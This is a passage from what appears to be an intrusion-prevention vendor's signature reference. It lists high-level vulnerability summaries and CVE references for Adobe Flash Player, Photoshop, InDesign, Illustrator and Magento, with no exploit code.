http://www.osvdb.org/86048
Back to top

Adobe-Flash-Player-Rectangle-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use-after-free vulnerability in Adobe Flash Player. A remote, unauthenticated attacker can use this to execute arbitrary code in the affected system.
Situation: File-Flash_Adobe-Flash-Player-Rectangle-Use-After-Free
References:
CVE-2016-4228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4228
Back to top

Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Input Validation
Description: A vulnerability has been reported in Adobe's flash player. The vulnerability is due to an unspecified type confusion. A remote attacker could exploit this vulnerability by enticing a target user to open web content containing an embedded flash file, or by enticing a user to open a flash email attachment. A successful exploitation attempt may result in the execution of arbitrary code in the target user's security context. Adobe is reporting that this vulnerability is currently being exploited in the wild.
Situation: Generic_SS-Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion
References:
CVE-2012-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779
BID-53395
http://www.securityfocus.com/bid/53395
OSVDB-81656
http://www.osvdb.org/81656
Back to top

Adobe-Flash-Player-Security-Bypass-CVE-2015-3099

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: A vulnerability exists in Adobe Flash Player.
Situation: File-Text_Adobe-Flash-Player-Security-Bypass-CVE-2015-3099
References:
CVE-2015-3099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3099
Back to top

Adobe-Flash-Player-Security-Bypass-CVE-2015-3102

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: A vulnerability exists in Adobe Flash Player.
Situation: HTTP_CSU-Adobe-Flash-Player-Security-Bypass-CVE-2015-3102
References:
CVE-2015-3102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3102
Back to top

Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a security context bypass vulnerability in Adobe Flash Player.
Situation: File-Text_Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044
References:
CVE-2015-3044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044
Back to top

Adobe-Flash-Player-Shader-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A code execution vulnerability exists in Adobe Flash Player. The vulnerability is due to a memory corruption error while processing crafted Shader objects. A remote attacker could exploit this vulnerability by enticing a target user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Flash_Adobe-Flash-Player-Shader-Memory-Corruption
References:
CVE-2014-0515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0515
BID-67092
http://www.securityfocus.com/bid/67092
OSVDB-106347
http://www.osvdb.org/106347
Back to top

Adobe-Flash-Player-Shader-Parameter-Write-What-Where

About this vulnerability: A vulnerability in Adobe Systems AIR desktop runtime
Risk: High
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player
Type: Malfunction
Description: A write-what-where vulnerability has been reported in a Adobe Flash Player. The vulnerability is due to an issue with processing Shader objects. A remote attacker could exploit this vulnerability by enticing a user into opening a page with a malicious SWF embedded within. Successful exploitation could lead to arbitrary code execution under the security context of the user process.
Situation: File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-2
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-3
References:
CVE-2015-3105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3105
Back to top

Adobe-Flash-Player-ShaderJob-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Malfunction
Description: A memory corruption vulnerability exists in Adobe Flash Player. The vulnerability is due to a race condition in the shader class, in which asynchronously modifying the width/height of a shader object while starting a shader job will result in corrupting the memory. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-ShaderJob-Memory-Corruption
References:
CVE-2015-3090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090
Back to top

Adobe-Flash-Player-Sharedobject-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems AIR
Risk: High
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Malfunction
Description: A code execution vulnerability exists in Adobe Flash Player. The vulnerability is due to a use-after-free error when terminating a worker thread containing a SharedObject. A remote attacker could exploit this vulnerability by enticing a target user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user. Note that this vulnerability is being actively exploited in the wild.
Situation: File-Flash_Adobe-Flash-Player-Sharedobject-Use-After-Free
References:
CVE-2014-0502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0502
BID-65702
http://www.securityfocus.com/bid/65702
OSVDB-103518
http://www.osvdb.org/103518
Back to top

Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player; Adobe Systems AIR
Type: Malfunction
Description: There is a vulnerability in Microsoft Word.
Situation: File-Text_Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035
References:
CVE-2012-2035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2035
Back to top

Adobe-Flash-Player-SWF-File-Code-Execution

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a vulnerability in Adobe Flash Player that allows execution of arbitrary code in the context of the current user.
Situation: HTTP_SS-Adobe-Flash-Player-SWF-File-Code-Execution
File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution
File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution-2
References:
CVE-2007-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0071
BID-29695
http://www.securityfocus.com/bid/29695
BID-29386
http://www.securityfocus.com/bid/29386
OSVDB-44282
http://www.osvdb.org/44282
Back to top

Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash
Risk: High
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Input Validation
Description: A memory corruption vulnerability exists in Adobe Flash Player. The vulnerability is due a use-after-free situation when handling the opaqueBackground property of a TextLine object. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted Flash content, though other attack vectors such as Microsoft Office documents may also be viable. A successful exploitation could result in arbitrary code execution in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free
References:
CVE-2015-5122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122
Back to top

Adobe-Flash-Player-Type-Confusion-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There is a memory corruption vulnerability in Adobe Flash Player. A successful attack may lead to code execution in the context of the current user.
Situation: File-Flash_Adobe-Flash-Player-Type-Confusion-Memory-Corruption
References:
CVE-2012-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0752
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2015-5122

About this vulnerability: Adobe Flash Player Use After Free
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Flash Player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-5122
References:
CVE-2015-5122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122
BID-75712
http://www.securityfocus.com/bid/75712
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2015-8413

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: Adobe Flash Player
Type: Use-after-free
Description: There exists a use after free vulnerability in Adobe Flash Player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8413
References:
CVE-2015-8413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8413
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2015-8430

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: Adobe Flash Player
Type: Use-after-free
Description: There exists a use after free vulnerability in Adobe Flash Player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8430
References:
CVE-2015-8430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8430
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2016-0988

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: Adobe Flash Player
Type: Use-after-free
Description: There exists a use after free vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-0988
References:
CVE-2016-0988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0988
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2016-7892

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-7892
References:
CVE-2016-7892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7892
MS16-154
http://technet.microsoft.com/security/bulletin/MS16-154
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2017-3058

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3058
References:
CVE-2017-3058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3058
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2017-3059

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3059
References:
CVE-2017-3059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3059
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2017-3062

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3062
References:
CVE-2017-3062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3062
Back to top

Adobe-Flash-Player-Use-After-Free-CVE-2017-3063

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3063
References:
CVE-2017-3063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3063
Back to top

Adobe-Flash-Player-Vulnerability-CVE-2012-1535

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a vulnerability in Adobe Flash Player.
Situation: File-OLE_Adobe-Flash-Player-Vulnerability-CVE-2012-1535
File-Flash_Adobe-Flash-Player-Vulnerability-CVE-2012-1535
References:
CVE-2012-1535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1535
BID-55009
http://www.securityfocus.com/bid/55009
OSVDB-84607
http://www.osvdb.org/84607
Back to top

Adobe-Flash-Selection.setfocus-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Adobe Flash Player Desktop Runtime
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A use-after-free vulnerability in Adobe Flash allows an attacker to run arbitrary code on the target system.
Situation: File-Flash_Adobe-Flash-Selection.setfocus-Use-After-Free
References:
CVE-2016-4227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4227
Back to top

Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144
References:
CVE-2016-4144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4144
Back to top

Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149
References:
CVE-2016-4149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4149
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121
References:
CVE-2016-4121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4121
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142
References:
CVE-2016-4142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4142
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143
References:
CVE-2016-4143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4143
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146
References:
CVE-2016-4146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4146
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147
References:
CVE-2016-4147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4147
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148
References:
CVE-2016-4148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4148
Back to top

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-7855

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-817-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Use-After-Free-CVE-2016-7855
References:
CVE-2016-7855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7855
Back to top

Adobe-Flash-Vulnerability-CVE-2011-0609

About this vulnerability: A vulnerability in Adobe Flash
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a vulnerability in Adobe Flash.
Situation: E-Mail_BS-Adobe-Flash-Exploit-CVE-2011-0609
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609-2
File-OLE_Adobe-Flash-Exploit-CVE-2011-0609
File-OLE_Adobe-Flash-Exploit-CVE-2011-0609-2
File-Flash_Adobe-Flash-Exploit-CVE-2011-0609-2
File-Flash_Adobe-Flash-Exploit-CVE-2011-0609
File-PDF_Adobe-Flash-Exploit-CVE-2011-0609
File-Binary_Adobe-Flash-Exploit-CVE-2011-0609
References:
CVE-2011-0609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0609
BID-46860
http://www.securityfocus.com/bid/46860
OSVDB-71254
http://www.osvdb.org/71254
Back to top

Adobe-Flash-Vulnerability-CVE-2011-0611

About this vulnerability: A vulnerability in Adobe Flash
Risk: High
First detected in: sgpkg-ips-400-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a vulnerability in Adobe Flash.
Situation: HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0611
File-OLE_Adobe-Flash-Exploit-CVE-2011-0611
File-Flash_Adobe-Flash-Exploit-CVE-2011-0611
File-Binary_Adobe-Flash-Exploit-CVE-2011-0611
References:
CVE-2011-0611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611
BID-47314
http://www.securityfocus.com/bid/47314
Back to top

Adobe-Flash-Vulnerability-CVE-2016-4171

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Vulnerability-CVE-2016-4171
References:
CVE-2016-4171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4171
Back to top

Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Illustrator CS3
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Illustrator
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Adobe Illustrator software. The vulnerability is due to a boundary error while parsing Encapsulated Postscript (.eps) files containing an overly long DSC comment value. Remote attackers can exploit this vulnerability by enticing target users to open a crafted EPS file with a vulnerable version of the affected product. Successful exploitation would result in arbitrary code execution with the privileges of the logged in user. If an attack is unsuccessful, the behaviour of the vulnerable application will appear unchanged.
Situation: HTTP_SS-Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
File-TextId_Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
References:
CVE-2009-4195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4195
BID-37192
http://www.securityfocus.com/bid/37192
OSVDB-60632
http://www.osvdb.org/60632
Back to top

Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication

About this vulnerability: A vulnerability in Adobe Systems InDesign
Risk: Moderate
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Adobe InDesign
Type: Malfunction
Description: There is a command execution vulnerability in Adobe InDesign Server. The vulnerability is due to a failure to restrict access to the SOAP interface. An attacker can exploit this vulnerability by sending RunScript SOAP requests to the vulnerable server. Successful exploitation could result in execution of arbitrary script code in the context of the service.
Situation: File-TextId_Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication
References:
OSVDB-87548
http://www.osvdb.org/87548
Back to top

Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution

About this vulnerability: A vulnerability in Adobe Systems InDesign
Risk: Moderate
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe InDesign
Type: Input Validation
Description: There has been reported a vulnerability in Adobe InDesign. This vulnerability could be exploited by opening a maliciously crafted document file. Successful exploitation could lead in arbitrary code execution.
Situation: File-TextId_Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution
References:
CVE-2019-7107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7107
Back to top

Adobe-Magento-Downloadcss-Cross-Site-Scripting

About this vulnerability: A vulnerability in Adobe Systems Magento Commerce
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: Adobe Magento
Type: Input Validation
Description: Improper validation of the file resource identifier in requests handled by DownloadCss.php causes a cross-site scripting vulnerability in Adobe Magento. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Adobe-Magento-Downloadcss-Cross-Site-Scripting
References:
CVE-2021-21029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21029
Back to top

Adobe-Magento-Remote-Code-Execution-CVE-2022-24086

About this vulnerability: An attempt to exploit a vulnerability in Adobe Magento detected
Risk: High
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Platform: Generic
Software: Adobe Magento
Type: Input Validation
Description: A pre-auth remote code execution vulnerability has been reported in Adobe Magento.
Situation: HTTP_CRL-Adobe-Magento-Remote-Code-Execution-CVE-2022-24086
References:
CVE-2022-24086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24086
Back to top

Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Adobe Photoshop
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop; Adobe Photoshop Album Starter; Adobe After Effects
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way multiple Adobe products parse BMP files. The vulnerability is due to boundary errors while handling BMP files Image Header. An attacker may exploit this vulnerability by enticing a target user to open a malicious BMP file. Successful exploitation might lead to injection and execution of arbitrary code in the security context of the currently logged in user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.
Situation: HTTP_SS-Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
File-Binary_Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
References:
CVE-2008-1765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765
BID-28874
http://www.securityfocus.com/bid/28874
Back to top

Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Photoshop CS5.1
Risk: Moderate
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Adobe Photoshop. The vulnerability is due to insufficient validation of Collada asset elements. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to download a malicious file. This can lead to arbitrary code execution in the context of the affected application.
Situation: File-TextId_Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow
References:
CVE-2012-2052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2052
BID-53464
http://www.securityfocus.com/bid/53464
OSVDB-81832
http://www.osvdb.org/81832
Back to top

Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Adobe Photoshop
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop
Type: Buffer Overflow
Description: A code execution vulnerability exists in Adobe Photoshop CS4.
Situation: HTTP_SS-Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
File-MPEG_Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
References:
CVE-2010-1296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1296
BID-40389
http://www.securityfocus.com/bid/40389
Back to top

Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption

About this vulnerability: A vulnerability in Adobe Systems Adobe Photoshop
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop
Type: Buffer Overflow
Description: A heap corruption vulnerability exists in Adobe Photoshop CS5. The vulnerability is due to insufficient boundary checking while processing crafted GIF files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious GIF file. A successful attack would result in the execution of arbitrary code in the security context of the target user. If the attack fails the affected application may terminate abnormally.
Situation: File-GIF_Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption
References:
CVE-2011-2131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2131
Back to top

Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Photoshop CS6
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported in Adobe Photoshop's Standard MultiPlugin.8BF. The vulnerability is due to an error while handling tRNS chunks in a PNG file. Remote, unauthenticated attackers can exploit this vulnerability by enticing a user to download and process a malicious PNG file. This can result in code execution in the context of the affected application.
Situation: File-PNG_Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow
References:
CVE-2012-4170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4170
BID-55333
http://www.securityfocus.com/bid/55333
OSVDB-85006
http://www.osvdb.org/85006
Back to top

Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Adobe Photoshop CS5.1
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop
Type: Buffer Overflow
